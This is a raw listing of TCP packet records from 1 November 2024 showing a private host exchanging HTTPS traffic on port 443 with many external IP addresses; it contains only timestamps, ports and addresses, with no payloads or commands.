Nov 1, 2024 20:58:18.492517948 CET	49526	443	192.168.11.20	23.199.48.23
Nov 1, 2024 20:58:18.492696047 CET	49526	443	192.168.11.20	23.199.48.23
Nov 1, 2024 20:58:18.492701054 CET	443	49526	23.199.48.23	192.168.11.20
Nov 1, 2024 20:58:18.501641035 CET	55312	443	192.168.11.20	64.202.112.31
Nov 1, 2024 20:58:18.517653942 CET	443	52142	107.23.5.106	192.168.11.20
Nov 1, 2024 20:58:18.518034935 CET	52142	443	192.168.11.20	107.23.5.106
Nov 1, 2024 20:58:18.518047094 CET	443	52142	107.23.5.106	192.168.11.20
Nov 1, 2024 20:58:18.518990040 CET	443	52142	107.23.5.106	192.168.11.20
Nov 1, 2024 20:58:18.519149065 CET	52142	443	192.168.11.20	107.23.5.106
Nov 1, 2024 20:58:18.520448923 CET	52142	443	192.168.11.20	107.23.5.106
Nov 1, 2024 20:58:18.520545959 CET	52142	443	192.168.11.20	107.23.5.106
Nov 1, 2024 20:58:18.520554066 CET	443	52142	107.23.5.106	192.168.11.20
Nov 1, 2024 20:58:18.562556028 CET	52142	443	192.168.11.20	107.23.5.106
Nov 1, 2024 20:58:18.562566996 CET	443	52142	107.23.5.106	192.168.11.20
Nov 1, 2024 20:58:18.580882072 CET	58641	443	192.168.11.20	104.19.131.76
Nov 1, 2024 20:58:18.580899000 CET	443	58641	104.19.131.76	192.168.11.20
Nov 1, 2024 20:58:18.581147909 CET	58641	443	192.168.11.20	104.19.131.76
Nov 1, 2024 20:58:18.581243038 CET	58641	443	192.168.11.20	104.19.131.76
Nov 1, 2024 20:58:18.581250906 CET	443	58641	104.19.131.76	192.168.11.20
Nov 1, 2024 20:58:18.598036051 CET	443	56733	151.101.1.44	192.168.11.20
Nov 1, 2024 20:58:18.598144054 CET	443	56733	151.101.1.44	192.168.11.20
Nov 1, 2024 20:58:18.598979950 CET	56733	443	192.168.11.20	151.101.1.44
Nov 1, 2024 20:58:18.600631952 CET	56733	443	192.168.11.20	151.101.1.44
Nov 1, 2024 20:58:18.600642920 CET	443	56733	151.101.1.44	192.168.11.20
Nov 1, 2024 20:58:18.601061106 CET	443	55312	64.202.112.31	192.168.11.20
Nov 1, 2024 20:58:18.601098061 CET	443	55312	64.202.112.31	192.168.11.20
Nov 1, 2024 20:58:18.601350069 CET	55312	443	192.168.11.20	64.202.112.31
Nov 1, 2024 20:58:18.610075951 CET	52142	443	192.168.11.20	107.23.5.106
Nov 1, 2024 20:58:18.612879992 CET	55312	443	192.168.11.20	64.202.112.31
Nov 1, 2024 20:58:18.612888098 CET	443	55312	64.202.112.31	192.168.11.20
Nov 1, 2024 20:58:18.624176979 CET	443	52142	107.23.5.106	192.168.11.20
Nov 1, 2024 20:58:18.624353886 CET	443	52142	107.23.5.106	192.168.11.20
Nov 1, 2024 20:58:18.624460936 CET	52142	443	192.168.11.20	107.23.5.106
Nov 1, 2024 20:58:18.624893904 CET	52142	443	192.168.11.20	107.23.5.106
Nov 1, 2024 20:58:18.624907970 CET	443	52142	107.23.5.106	192.168.11.20
Nov 1, 2024 20:58:18.649569988 CET	49965	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:18.649589062 CET	443	49965	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:18.649800062 CET	49965	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:18.649962902 CET	49965	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:18.649976015 CET	443	49965	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:18.668467999 CET	60181	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:18.668483973 CET	443	60181	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:18.668598890 CET	60181	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:18.668777943 CET	60181	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:18.668787003 CET	443	60181	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:18.689286947 CET	443	49526	23.199.48.23	192.168.11.20
Nov 1, 2024 20:58:18.689599037 CET	49526	443	192.168.11.20	23.199.48.23
Nov 1, 2024 20:58:18.689604998 CET	443	49526	23.199.48.23	192.168.11.20
Nov 1, 2024 20:58:18.690316916 CET	443	49526	23.199.48.23	192.168.11.20
Nov 1, 2024 20:58:18.690504074 CET	49526	443	192.168.11.20	23.199.48.23
Nov 1, 2024 20:58:18.691493034 CET	49526	443	192.168.11.20	23.199.48.23
Nov 1, 2024 20:58:18.691550970 CET	443	49526	23.199.48.23	192.168.11.20
Nov 1, 2024 20:58:18.691627979 CET	49526	443	192.168.11.20	23.199.48.23
Nov 1, 2024 20:58:18.704163074 CET	56540	443	192.168.11.20	172.241.51.69
Nov 1, 2024 20:58:18.704175949 CET	443	56540	172.241.51.69	192.168.11.20
Nov 1, 2024 20:58:18.704334021 CET	56540	443	192.168.11.20	172.241.51.69
Nov 1, 2024 20:58:18.704446077 CET	56540	443	192.168.11.20	172.241.51.69
Nov 1, 2024 20:58:18.704453945 CET	443	56540	172.241.51.69	192.168.11.20
Nov 1, 2024 20:58:18.710361958 CET	61436	443	192.168.11.20	195.244.31.11
Nov 1, 2024 20:58:18.710378885 CET	443	61436	195.244.31.11	192.168.11.20
Nov 1, 2024 20:58:18.710606098 CET	61436	443	192.168.11.20	195.244.31.11
Nov 1, 2024 20:58:18.710711956 CET	61436	443	192.168.11.20	195.244.31.11
Nov 1, 2024 20:58:18.710720062 CET	443	61436	195.244.31.11	192.168.11.20
Nov 1, 2024 20:58:18.720885038 CET	56770	443	192.168.11.20	35.208.249.213
Nov 1, 2024 20:58:18.720895052 CET	443	56770	35.208.249.213	192.168.11.20
Nov 1, 2024 20:58:18.721060038 CET	56770	443	192.168.11.20	35.208.249.213
Nov 1, 2024 20:58:18.721158028 CET	56770	443	192.168.11.20	35.208.249.213
Nov 1, 2024 20:58:18.721167088 CET	443	56770	35.208.249.213	192.168.11.20
Nov 1, 2024 20:58:18.735758066 CET	49526	443	192.168.11.20	23.199.48.23
Nov 1, 2024 20:58:18.735766888 CET	443	49526	23.199.48.23	192.168.11.20
Nov 1, 2024 20:58:18.746659040 CET	53018	443	192.168.11.20	35.213.89.133
Nov 1, 2024 20:58:18.746671915 CET	443	53018	35.213.89.133	192.168.11.20
Nov 1, 2024 20:58:18.746889114 CET	53018	443	192.168.11.20	35.213.89.133
Nov 1, 2024 20:58:18.747090101 CET	53018	443	192.168.11.20	35.213.89.133
Nov 1, 2024 20:58:18.747098923 CET	443	53018	35.213.89.133	192.168.11.20
Nov 1, 2024 20:58:18.777180910 CET	443	58641	104.19.131.76	192.168.11.20
Nov 1, 2024 20:58:18.777532101 CET	58641	443	192.168.11.20	104.19.131.76
Nov 1, 2024 20:58:18.777540922 CET	443	58641	104.19.131.76	192.168.11.20
Nov 1, 2024 20:58:18.778256893 CET	443	58641	104.19.131.76	192.168.11.20
Nov 1, 2024 20:58:18.778424978 CET	58641	443	192.168.11.20	104.19.131.76
Nov 1, 2024 20:58:18.779596090 CET	58641	443	192.168.11.20	104.19.131.76
Nov 1, 2024 20:58:18.779683113 CET	443	58641	104.19.131.76	192.168.11.20
Nov 1, 2024 20:58:18.779694080 CET	58641	443	192.168.11.20	104.19.131.76
Nov 1, 2024 20:58:18.782586098 CET	49526	443	192.168.11.20	23.199.48.23
Nov 1, 2024 20:58:18.823960066 CET	443	58641	104.19.131.76	192.168.11.20
Nov 1, 2024 20:58:18.830651999 CET	58641	443	192.168.11.20	104.19.131.76
Nov 1, 2024 20:58:18.830658913 CET	443	58641	104.19.131.76	192.168.11.20
Nov 1, 2024 20:58:18.856169939 CET	443	49965	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:18.856462955 CET	49965	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:18.856472015 CET	443	49965	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:18.857165098 CET	443	49965	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:18.857508898 CET	49965	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:18.859301090 CET	49965	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:18.859376907 CET	443	49965	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:18.859741926 CET	61833	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:18.859755993 CET	443	61833	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:18.859853983 CET	61088	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:18.859869957 CET	443	61088	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:18.859880924 CET	61833	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:18.859918118 CET	49965	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:18.859926939 CET	443	49965	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:18.859992027 CET	61833	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:18.859998941 CET	443	61833	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:18.860152006 CET	61088	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:18.860294104 CET	61088	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:18.860304117 CET	443	61088	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:18.860507965 CET	54103	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:18.860517979 CET	443	54103	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:18.860663891 CET	56718	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:18.860676050 CET	443	56718	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:18.860688925 CET	54103	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:18.860786915 CET	54103	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:18.860791922 CET	443	54103	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:18.860923052 CET	56718	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:18.861032009 CET	56718	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:18.861038923 CET	443	56718	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:18.874001980 CET	64543	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:18.874015093 CET	443	64543	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:18.874125957 CET	58137	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:18.874139071 CET	443	58137	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:18.874192953 CET	64543	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:18.874285936 CET	58137	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:18.876121044 CET	64543	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:18.876130104 CET	443	64543	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:18.876355886 CET	58641	443	192.168.11.20	104.19.131.76
Nov 1, 2024 20:58:18.876454115 CET	58137	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:18.876461983 CET	443	58137	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:18.904141903 CET	443	49526	23.199.48.23	192.168.11.20
Nov 1, 2024 20:58:18.904676914 CET	443	49526	23.199.48.23	192.168.11.20
Nov 1, 2024 20:58:18.904894114 CET	49526	443	192.168.11.20	23.199.48.23
Nov 1, 2024 20:58:18.905006886 CET	49526	443	192.168.11.20	23.199.48.23
Nov 1, 2024 20:58:18.905014992 CET	443	49526	23.199.48.23	192.168.11.20
Nov 1, 2024 20:58:18.906979084 CET	443	61436	195.244.31.11	192.168.11.20
Nov 1, 2024 20:58:18.909224987 CET	49965	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:18.909693956 CET	61436	443	192.168.11.20	195.244.31.11
Nov 1, 2024 20:58:18.909703016 CET	443	61436	195.244.31.11	192.168.11.20
Nov 1, 2024 20:58:18.910429001 CET	443	61436	195.244.31.11	192.168.11.20
Nov 1, 2024 20:58:18.910623074 CET	61436	443	192.168.11.20	195.244.31.11
Nov 1, 2024 20:58:18.922148943 CET	61436	443	192.168.11.20	195.244.31.11
Nov 1, 2024 20:58:18.922236919 CET	443	61436	195.244.31.11	192.168.11.20
Nov 1, 2024 20:58:18.927455902 CET	61436	443	192.168.11.20	195.244.31.11
Nov 1, 2024 20:58:18.927464962 CET	443	61436	195.244.31.11	192.168.11.20
Nov 1, 2024 20:58:18.958750010 CET	443	60181	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:18.959117889 CET	60181	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:18.959125996 CET	443	60181	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:18.960362911 CET	443	60181	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:18.960545063 CET	60181	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:18.970694065 CET	443	56770	35.208.249.213	192.168.11.20
Nov 1, 2024 20:58:18.971159935 CET	61436	443	192.168.11.20	195.244.31.11
Nov 1, 2024 20:58:18.971765041 CET	56770	443	192.168.11.20	35.208.249.213
Nov 1, 2024 20:58:18.971771955 CET	443	56770	35.208.249.213	192.168.11.20
Nov 1, 2024 20:58:18.973009109 CET	443	56770	35.208.249.213	192.168.11.20
Nov 1, 2024 20:58:18.973285913 CET	56770	443	192.168.11.20	35.208.249.213
Nov 1, 2024 20:58:19.012396097 CET	60181	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.012562037 CET	443	60181	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.012590885 CET	60181	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.012940884 CET	56770	443	192.168.11.20	35.208.249.213
Nov 1, 2024 20:58:19.013020992 CET	56770	443	192.168.11.20	35.208.249.213
Nov 1, 2024 20:58:19.013026953 CET	443	56770	35.208.249.213	192.168.11.20
Nov 1, 2024 20:58:19.013052940 CET	443	56770	35.208.249.213	192.168.11.20
Nov 1, 2024 20:58:19.018591881 CET	51862	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:19.018611908 CET	443	51862	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:19.018838882 CET	51862	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:19.019056082 CET	51862	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:19.019064903 CET	443	51862	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:19.032046080 CET	443	58641	104.19.131.76	192.168.11.20
Nov 1, 2024 20:58:19.032094002 CET	443	58641	104.19.131.76	192.168.11.20
Nov 1, 2024 20:58:19.032227993 CET	58641	443	192.168.11.20	104.19.131.76
Nov 1, 2024 20:58:19.032835960 CET	58641	443	192.168.11.20	104.19.131.76
Nov 1, 2024 20:58:19.032849073 CET	443	58641	104.19.131.76	192.168.11.20
Nov 1, 2024 20:58:19.054903030 CET	443	49965	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:19.054984093 CET	443	49965	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:19.055263996 CET	49965	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:19.055572987 CET	49965	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:19.055572987 CET	49965	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:19.055588961 CET	443	49965	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:19.055733919 CET	49965	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:19.056135893 CET	60483	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:19.056157112 CET	443	60483	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:19.056286097 CET	60483	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:19.056490898 CET	60483	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:19.056505919 CET	443	60483	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:19.057580948 CET	443	56718	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.058000088 CET	56718	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.058013916 CET	443	56718	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.059119940 CET	443	56718	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.059333086 CET	56718	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.059534073 CET	443	54103	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.059782028 CET	54103	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.059793949 CET	443	54103	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.059967041 CET	443	60181	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.060395002 CET	56718	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.060476065 CET	56718	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.060511112 CET	443	56718	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.061057091 CET	443	54103	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.061216116 CET	54103	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.062155962 CET	54103	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.062268972 CET	443	54103	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.062393904 CET	54103	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.064908981 CET	56770	443	192.168.11.20	35.208.249.213
Nov 1, 2024 20:58:19.064919949 CET	443	56770	35.208.249.213	192.168.11.20
Nov 1, 2024 20:58:19.064960957 CET	60181	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.064965963 CET	443	60181	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.068039894 CET	443	64543	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.068320990 CET	64543	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.068327904 CET	443	64543	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.069422007 CET	443	64543	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.069715023 CET	64543	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.070323944 CET	443	61088	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.070764065 CET	61088	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.070779085 CET	443	61088	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.070859909 CET	64543	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.070974112 CET	443	64543	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.071103096 CET	64543	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.072215080 CET	443	61833	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.072455883 CET	61833	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.072467089 CET	443	61833	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.072472095 CET	443	61088	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.072688103 CET	61088	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.073553085 CET	443	61833	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.073740005 CET	61833	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.073749065 CET	443	61833	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.073921919 CET	61833	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.077567101 CET	443	58137	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.077867031 CET	58137	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.077881098 CET	443	58137	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.079042912 CET	443	58137	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.079236031 CET	58137	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.080394030 CET	61833	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.080465078 CET	61833	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.080507040 CET	443	61833	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.104022980 CET	443	54103	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.112726927 CET	56770	443	192.168.11.20	35.208.249.213
Nov 1, 2024 20:58:19.112726927 CET	54103	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.112740993 CET	443	54103	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.112752914 CET	61088	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.112756968 CET	56718	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.112756968 CET	64543	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.112766981 CET	443	56718	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.112767935 CET	443	61088	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.112771988 CET	443	64543	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.112775087 CET	60181	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.128664970 CET	61833	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.128675938 CET	443	61833	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.132971048 CET	58137	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.132987022 CET	443	58137	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.136001110 CET	61088	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.136138916 CET	443	61088	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.136375904 CET	58137	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.136493921 CET	443	58137	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.136668921 CET	61088	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.136683941 CET	443	61088	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.136704922 CET	58137	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.136718988 CET	443	58137	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.139239073 CET	443	60181	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.139302015 CET	443	60181	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.139508009 CET	60181	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.160593033 CET	54103	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.160618067 CET	56718	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.160644054 CET	64543	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.167943001 CET	60181	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.167963982 CET	443	60181	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.168678045 CET	61694	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.168699980 CET	443	61694	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.168888092 CET	61694	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.169022083 CET	61694	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.169030905 CET	443	61694	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.173666954 CET	443	61436	195.244.31.11	192.168.11.20
Nov 1, 2024 20:58:19.175633907 CET	61833	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.191546917 CET	58137	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.191560030 CET	61088	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.216710091 CET	443	56770	35.208.249.213	192.168.11.20
Nov 1, 2024 20:58:19.216775894 CET	443	56770	35.208.249.213	192.168.11.20
Nov 1, 2024 20:58:19.216964006 CET	56770	443	192.168.11.20	35.208.249.213
Nov 1, 2024 20:58:19.217428923 CET	56770	443	192.168.11.20	35.208.249.213
Nov 1, 2024 20:58:19.217430115 CET	56770	443	192.168.11.20	35.208.249.213
Nov 1, 2024 20:58:19.217446089 CET	443	56770	35.208.249.213	192.168.11.20
Nov 1, 2024 20:58:19.217642069 CET	56770	443	192.168.11.20	35.208.249.213
Nov 1, 2024 20:58:19.223611116 CET	61436	443	192.168.11.20	195.244.31.11
Nov 1, 2024 20:58:19.223624945 CET	443	61436	195.244.31.11	192.168.11.20
Nov 1, 2024 20:58:19.224075079 CET	61436	443	192.168.11.20	195.244.31.11
Nov 1, 2024 20:58:19.224144936 CET	443	61436	195.244.31.11	192.168.11.20
Nov 1, 2024 20:58:19.224266052 CET	443	61436	195.244.31.11	192.168.11.20
Nov 1, 2024 20:58:19.224302053 CET	61436	443	192.168.11.20	195.244.31.11
Nov 1, 2024 20:58:19.224373102 CET	61436	443	192.168.11.20	195.244.31.11
Nov 1, 2024 20:58:19.260243893 CET	443	61088	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.260309935 CET	443	61088	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.260350943 CET	443	60483	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:19.260505915 CET	61088	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.261538029 CET	61088	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.261548996 CET	443	61088	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.261985064 CET	60483	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:19.261996031 CET	443	60483	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:19.262278080 CET	443	60483	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:19.262737989 CET	60483	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:19.262829065 CET	443	60483	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:19.262923002 CET	60483	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:19.264170885 CET	443	61833	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.264230013 CET	443	61833	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.264430046 CET	61833	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.264503002 CET	61833	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.264509916 CET	443	61833	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.276650906 CET	443	58137	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.276702881 CET	443	58137	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.276828051 CET	58137	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.276886940 CET	58137	443	192.168.11.20	9.9.9.9
Nov 1, 2024 20:58:19.276895046 CET	443	58137	9.9.9.9	192.168.11.20
Nov 1, 2024 20:58:19.278671026 CET	443	53018	35.213.89.133	192.168.11.20
Nov 1, 2024 20:58:19.279205084 CET	53018	443	192.168.11.20	35.213.89.133
Nov 1, 2024 20:58:19.279215097 CET	443	53018	35.213.89.133	192.168.11.20
Nov 1, 2024 20:58:19.280014038 CET	443	53018	35.213.89.133	192.168.11.20
Nov 1, 2024 20:58:19.280219078 CET	53018	443	192.168.11.20	35.213.89.133
Nov 1, 2024 20:58:19.281276941 CET	53018	443	192.168.11.20	35.213.89.133
Nov 1, 2024 20:58:19.281357050 CET	53018	443	192.168.11.20	35.213.89.133
Nov 1, 2024 20:58:19.281363010 CET	443	53018	35.213.89.133	192.168.11.20
Nov 1, 2024 20:58:19.281373024 CET	443	53018	35.213.89.133	192.168.11.20
Nov 1, 2024 20:58:19.283708096 CET	443	56718	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.283746958 CET	443	56718	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.284060001 CET	56718	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.284060001 CET	56718	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.286185026 CET	443	54103	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.286221981 CET	443	54103	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.286331892 CET	54103	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.286479950 CET	54103	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.286485910 CET	443	54103	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.299560070 CET	443	64543	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.299598932 CET	443	64543	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.299825907 CET	64543	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.299877882 CET	64543	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.299887896 CET	443	64543	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.304017067 CET	443	60483	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:19.304656982 CET	443	51862	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:19.304989100 CET	51862	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:19.304996967 CET	443	51862	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:19.306016922 CET	443	51862	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:19.306261063 CET	51862	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:19.307215929 CET	60483	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:19.307368994 CET	51862	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:19.307440042 CET	51862	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:19.307450056 CET	443	51862	68.67.179.155	192.168.11.20
